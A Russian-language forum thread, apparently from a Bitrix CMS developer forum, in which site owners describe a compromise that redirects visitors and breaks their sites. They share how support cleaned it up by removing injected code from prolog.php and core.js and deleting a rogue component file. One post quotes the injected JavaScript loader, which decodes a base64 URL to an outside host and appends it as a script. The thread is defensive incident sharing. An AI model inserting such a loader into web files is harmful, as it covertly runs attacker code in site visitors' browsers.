| Цитата |
|---|
3. Очищаем кэш Битрикс. Проблема решена. Но уязвимость осталась. Теперь надо как то от нее избавляться. |
|
Разработчикам |
Форум
Переадресация на другой сайт. Что за напасть?
|
Добрый день. Я нашла эти две ссылки и удалили их вручную, через 2-3 недели, ссылки опять появились - удалила. А вчера, открываю сайт, в админку попасть не могу, куда не жму, все не кликабельно. На сайте так же, товар есть, его видно, но переключения между вкладками нет, картинки тоже не кликабельны, товар в корзину не кладется. Обратилась в поддержку битрикс. Может кому-то поможет, специалист мне удалил эти две ссылки (всем уже известные). Ниже как решалась проблема, может кому-то пригодится.
У вас в файле /bitrix/modules/main/include/prolog.php были добавлены строки вызывающие скрипт: // \n<sc ript src=" (?) ript>; В файл /bitrix/js/main/core/core.js была добавлена строка: \bs=document.createElement(`script`);s.src=atob(`aHR0cHM6Ly9zdG9yZWpzY2RuLnB3L2pxdWVyeXVpLmpz`);document.head.appendChild(s); Сайт заработал корректно только после ручного удаления вредоносных строк. А также удалил вам вирусный файл /bitrix/components/bitrix/main.file.input/main.php. Из-за которого возникла вся эта ситуация.19:20 То есть из-за этого файла в /bitrix/js/main/core/core.js и в /bitrix/modules/main/include/prolog.php добавились лишние строки. |
|
|
|
|
|
Ирина Гуреева, столкнулся с тем же. Спасибо очень помог ваш пост. Но я не обновлял с 2020 года битрикс, интересно обновление спасает от таких взломов или нет?
И есть какие-то рекомендации по защите? |
|
|
|
|
|
Аналогичная проблема - сегодня обнаружили этот вирус на сайте заказчиков. Судя по всему уязвимость в самом Битриксе. Комментарии от разработчиков последуют? Если бы не заблокированный домен на reg.ru, то вирус бы оставался активным на зараженных сайтах.
Но эту уязвимость в коде Битрикс с успехом могут использовать еще раз. Итак вопрос - где комментарии от команды Битрикса? |
|
|
|
|
|
Команда битрикс говорит, нужно обновить сайт до последней версии. У меня не было обновления 3 года, поскольку кто делал сайт, говорит, что все разъедется и может много чего начать работать не корректно. Пока обновлять не решилась, но видно придется задуматься об этом.
|
|
|
|
|
|
Вчера тоже у одного из клиентов перестал работать сайт.
Админка осталась доступна. Включил подробную диагностику в .htaccess. Ошибка в прологе на строке 15 Пошел туда куда послали : там странная ссылка Убрал - сайт заработал ps. Диагноз обычный - не обновленная с 2019 платформа pps. дополнительный штрих - почему то одновременно клиент потерял доступ к хостингу и к ftp и ssh . совпадение или связанные события будет понятно после восстановления доступа к хостингу |
|
|
|
|
|
|||
|
|
|
|
|||
|
|
|
|
Первая ссылка перестала появляться, а вот вторая в /bitrix/js/main/core/core.js с завидной регулярностью, раз в неделю удаляю.
Ядро пока не обновляла, только лицензию продлила... |
||||
|
|
|
|||
